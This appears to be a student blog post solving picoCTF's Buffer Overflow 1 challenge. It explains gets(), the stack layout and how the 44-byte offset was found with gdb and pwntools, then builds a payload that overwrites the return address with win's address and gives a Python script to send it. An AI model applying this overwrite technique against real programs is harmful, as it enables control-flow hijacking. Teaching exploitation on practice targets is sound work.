In the Introduction to Information Security (IIS) course in OMSCS, I learned a lot about buffer overflows. In this post, I walk through the solution to an actual CTF problem.
Overview
During my second course in OMSCS, I solved a Buffer Overflow problem in the Introduction to Information Security (IIS) course. Since I gained a lot of insights from this experience, I decided to summarize the solution. For more details about the IIS course, please refer to the following article:
CS 6035 Introduction to Information Security
The Buffer Overflow problem I solve here is an actual CTF challenge. CTF (Capture the Flag) is a contest where participants exploit vulnerabilities to capture flags. I chose picoCTF, a permanently available CTF platform, because it had a problem that applies what I learned in class. picoCTF is aimed at middle and high school students, so many of its problems are said to be relatively simple. I solved the Buffer Overflow 1 problem in the Binary Exploitation category, working in the picoCTF web shell after logging in.
Note: This post is not intended for actual attacks; the purpose of this introduction is to raise awareness of these types of attacks.
Source Code
First, upon examining the source code, we see that the vuln function is called from main, and the gets function is used to read into the buffer buf. In the vuln function, there is an operation that prints the return address. The return address is a record of where the program should return after a function call.
Additionally, the win function is defined but not referenced from anywhere. The source code is as follows:
The return address is explained here:
Call Stack
The gets function reads a string of arbitrary length and never checks it against the size of the destination buffer, which is what makes a Buffer Overflow possible.
Essential Guide to the gets Function in C with 10 Clear Examples
When the binary is executed, it prints the return address of the vuln function, which is 0x804932f.
Disassemble
To understand why the return address of the vuln function is 0x804932f, we can disassemble the compiled executable with objdump and inspect the resulting assembly.
I disassembled the executable file named vuln with objdump and saved the output as vuln.asm.
For instructions on how to disassemble an ELF executable file with the corresponding C source code using objdump, refer to the following link:
How to Disassemble an ELF Executable with C Source Code Using objdump
In the main section of vuln.asm, the call to the vuln function is at 0x804932a. Therefore, when the executable is run, the return address from the vuln function back to main is the address of the instruction that follows the call at 0x804932a, which is 0x804932f.
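The arithmetic behind this can be checked directly. The sketch below assumes that the call at 0x804932a is a 5-byte near call (one opcode byte plus a 4-byte relative displacement), the usual encoding for a direct call in 32-bit x86 code. The constant names are illustrative and do not come from the challenge.

```python
# Address of the call instruction in main, taken from the disassembly.
CALL_ADDR = 0x804932a

# Assumption: a direct near call in 32-bit x86 is 1 opcode byte + 4 displacement bytes.
CALL_INSTRUCTION_LEN = 5

# The CPU pushes the address of the next instruction as the return address.
return_address = CALL_ADDR + CALL_INSTRUCTION_LEN

print(hex(return_address))
```

The result matches the value printed by the program, which is consistent with the call being 5 bytes long.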
To obtain the flag, this return address must be overwritten with the address of the win function, so that a function that would never normally run gets executed.
Debug
Debugging with plain gdb is possible, but its output is hard to read. Therefore, I installed gdb-peda by following the steps in the article below:
Using the gdb Debugger
As described in the link above, breakpoints can be set with the b command once debugging begins, and I set one on the vuln function. With gdb-peda, the registers, code, and stack are all displayed at once.
On entry to the vuln function, the top of the stack was at address 0xfffef54c, and the value stored there was the return address, 0x804932f. The info frame command likewise reports the saved EIP (Extended Instruction Pointer) as 0x804932f, which, as the following quote explains, is the return address.
saved eip “0x804869a” is the so called “return address”, i.e., the instruction to resume in the caller stack frame after returning from this callee stack. It is pushed onto the stack upon the “CALL” instruction (save it for return).
How to interpret GDB “info frame” output?
When I entered the string test, it was stored at the address 0xfffef520, which is therefore where the buffer begins.
To summarize, the return address of the vuln function is stored at 0xfffef54c. Since the stack grows downward as execution progresses, the buffer (buf) sits at the lower address 0xfffef520. The difference between these addresses is calculated as follows:
0xfffef54c - 0xfffef520 = 0x2c
This indicates that the return address lies 44 bytes past the start of the buffer at 0xfffef520. As a result, it should be possible to overwrite the return address with an input of 44 arbitrary bytes followed by the address of the win function.
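To make the layout concrete, here is a minimal sketch that models the memory from the start of buf up to and including the return-address slot as a byte array. Only the two addresses and the original return address come from the debugging session above. The array model and the "BBBB" marker are illustrative assumptions, not how the process is actually laid out internally.

```python
import struct

BUF_ADDR = 0xfffef520       # where the input "test" was stored
RET_SLOT_ADDR = 0xfffef54c  # where the saved return address is stored

# Distance from the start of buf to the return-address slot.
offset = RET_SLOT_ADDR - BUF_ADDR

# Model the bytes from buf through the 4-byte return-address slot.
frame = bytearray(offset + 4)
struct.pack_into("<I", frame, offset, 0x804932f)  # original return address

# gets copies input upward from buf with no bounds check, so input
# longer than `offset` bytes spills into the return-address slot.
user_input = b"A" * offset + b"BBBB"
frame[:len(user_input)] = user_input

overwritten = struct.unpack_from("<I", frame, offset)[0]
print(offset, hex(overwritten))
```

In this model, the four bytes that follow the 44 filler bytes end up in the slot that originally held 0x804932f.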
Solution
The offset calculated above can be verified efficiently with the Python library pwntools. Its cyclic function generates a pattern string in which every 4-character substring is unique, so any 4 bytes taken from the pattern identify their own position.
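For readers without pwntools installed, the idea behind such a pattern can be sketched with the standard library alone. The code below is a stand-in, not the pwntools implementation: it builds a de Bruijn sequence over the lowercase alphabet with 4-character windows, which I assume matches the defaults of cyclic. The function names de_bruijn and cyclic_pattern are hypothetical.

```python
from itertools import islice
from string import ascii_lowercase


def de_bruijn(alphabet, n):
    """Lazily yield a de Bruijn sequence: every length-n window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic_pattern(length, alphabet=ascii_lowercase, n=4):
    """Return the first `length` characters of the sequence as a string."""
    return "".join(islice(de_bruijn(alphabet, n), length))


pattern = cyclic_pattern(100)
print(pattern)
```

Because no 4-character window repeats, whichever 4 bytes land in the return address are enough to recover their offset in the input.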
When I ran the target executable in gdb with the generated pattern string as input, the return address was overwritten with 0x6161616c.
Since the return address has been overwritten with 0x6161616c, we can use the cyclic_find function to determine the position of 0x6161616c within the generated string, that is, how many characters precede the bytes that landed on the return address. The result is 44, which confirms that the return address sits 44 bytes from the start of the buffer and matches the earlier address calculation. Therefore, we simply need to append the address of the win function to 44 bytes of padding.
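The lookup itself is simple enough to reproduce by hand. The sketch below assumes the pattern begins the way the default pwntools pattern does (aaaabaaacaaad...) and hard-codes only that prefix. It decodes the overwritten value as little-endian bytes and searches for them, which is my reading of what cyclic_find does rather than its actual source.

```python
import struct

# Assumed prefix of the default cyclic pattern (lowercase alphabet, 4-byte windows).
PATTERN_PREFIX = "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaan"

# Value observed in the return address after the crash.
overwritten_eip = 0x6161616c

# On little-endian x86 the bytes sit in memory lowest byte first: 6c 61 61 61.
needle = struct.pack("<I", overwritten_eip).decode("ascii")

# Number of input characters that precede the return address.
offset = PATTERN_PREFIX.find(needle)

print(needle, offset)
```

The 4 bytes decode to "laaa", and the characters in front of that substring are exactly the padding needed before the new return address.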
To obtain the address of the win function, I re-examined the disassembled vuln.asm. The win function starts at 0x080491f6, so this is the value to append to the 44-byte string.
However, because the target is little-endian, the address is stored in memory from the least significant byte to the most significant byte. Therefore, 0x080491f6 must be supplied in reverse byte order, resulting in \xf6\x91\x04\x08.
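Rather than reversing the bytes by hand, the conversion can be left to the standard struct module. This is a small sketch. The constant name WIN_ADDR is mine, and "<I" means a little-endian unsigned 32-bit integer.

```python
import struct

WIN_ADDR = 0x080491f6  # start of win, taken from the disassembly

# "<I" = little-endian, unsigned 32-bit integer.
packed = struct.pack("<I", WIN_ADDR)

# The same result using the built-in int method.
packed_alt = WIN_ADDR.to_bytes(4, byteorder="little")

print(packed)
```

pwntools offers a p32 helper for the same purpose, but the standard library is enough for a single address.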
Therefore, the input that calls the win function consists of 44 bytes of padding followed by \xf6\x91\x04\x08.
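Putting the two pieces together, the payload can be assembled as below. This is a minimal sketch. The function name build_payload and the filler byte "A" are arbitrary choices of mine, and the offset and address are the values found above.

```python
import struct

OFFSET = 44            # bytes between the start of buf and the return address
WIN_ADDR = 0x080491f6  # address of win from the disassembly


def build_payload(offset=OFFSET, target=WIN_ADDR, filler=b"A"):
    """Return filler bytes up to the return address, then the target address."""
    return filler * offset + struct.pack("<I", target)


payload = build_payload()

# gets stops reading at a newline, so the payload itself must not contain one.
assert b"\n" not in payload

print(len(payload), payload)
```

The payload is 48 bytes long. A trailing newline is added only when the input is sent, to end the gets call.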
With this input, the return address was overwritten with the address of the win function. When vuln finishes, the program does not return to main but jumps straight to the win function, which confirms that the exploit was successful.
In picoCTF, the flag is retrieved from the instance specified in the problem, so the constructed input has to be sent to that instance.
When the flag can be obtained by passing input to the executable, the whole process can also be done entirely within Python, for example with pwntools.
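As a rough illustration of the scripted approach, the sketch below feeds the payload to a local process using only the standard library (subprocess) instead of pwntools. The function name run_with_input and the ./vuln path are assumptions. The script runs the binary only if that file exists, and a remote instance would need a socket connection instead.

```python
import os
import struct
import subprocess

# 44 filler bytes followed by the little-endian address of win.
payload = b"A" * 44 + struct.pack("<I", 0x080491f6)


def run_with_input(argv, data, timeout=5):
    """Run argv, send data plus a newline on stdin, and return its output bytes."""
    result = subprocess.run(
        argv,
        input=data + b"\n",  # the newline ends the gets call
        stdout=subprocess.PIPE,
        stderr=subprocess.STDOUT,
        timeout=timeout,
    )
    return result.stdout


# Assumed local path of the challenge binary; skipped when it is absent.
if os.path.exists("./vuln"):
    print(run_with_input(["./vuln"], payload).decode(errors="replace"))
```

Keeping the payload construction and the delivery in one script makes it easy to rerun the attempt after changing the offset or the address.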
Summary of Pwntools Functions and Usage [Japanese] #CTF #Pwn (https://qiita.com/8ayac/items/12a3523394080e56ad5a)
Reflection
This experience provided a great opportunity to touch on registers and assembly language. By performing debugging, I was able to verify the behavior of the stack and the role of the return address, which deepened my understanding of how programs operate. I believe that the knowledge gained from this experience will serve as a valuable introduction when I learn more in-depth topics in future OS classes.